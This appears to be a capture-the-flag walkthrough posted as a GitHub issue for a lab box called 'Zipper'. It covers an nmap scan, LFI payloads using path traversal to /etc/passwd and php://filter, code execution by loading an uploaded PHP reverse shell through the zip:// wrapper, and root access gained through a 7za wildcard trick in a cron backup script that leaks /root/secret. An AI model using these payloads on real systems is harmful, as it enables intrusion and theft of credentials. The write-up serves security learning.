Open WDavid404 opened 3 months ago
```text
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
```
80/tcp --> click the "Home (current)" link, which goes to http://192.168.196.229/index.php?**file=home** --> it may have an LFI vulnerability.
Try
../../../../../../etc/passwd
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
...
--> didn't work
finally,
php://filter/convert.base64-encode/resource=index
-->
Try php://filter/convert.base64-encode/resource=upload
(because we found the /upload page)
https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/
-->
192.168.196.229/index.php?file=zip://uploads/upload_1722343257.zip%23php_reverse_me1
Note (found with linpeas, the cron backup script):
```bash
#!/bin/bash
# runs as root: it can read /root/secret and uses it as the archive password
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
# unquoted *.zip is expanded by the shell, so an upload whose name starts with
# '@' or '-' is passed to 7za as a list file or a switch, not as a file to add
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log
```
cat /opt/backups/backup.log --->
```text
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor (A00F11),ASM,AES-NI)
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 818
Scanning the drive:
3 files, 394 bytes (1 KiB)
Updating archive: /opt/backups/backup.zip
Items to compress: 3
Files read from disk: 3
Archive size: 818 bytes (1 KiB)
Scan WARNINGS for files and folders:
WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1
```
Following https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks,
then run cat /opt/backups/backup.log
again --> no change...
And we can find that there were already @enox.zip
and enox.zip -> /root/secret,
which is doing the same thing we just did.
So "WildCardsGoingWild" in the backup.log file is actually root's secret.
Try su root with WildCardsGoingWild as the password --> works!!
Key points:
php://filter/convert.base64-encode/resource=<page, e.g. index, upload>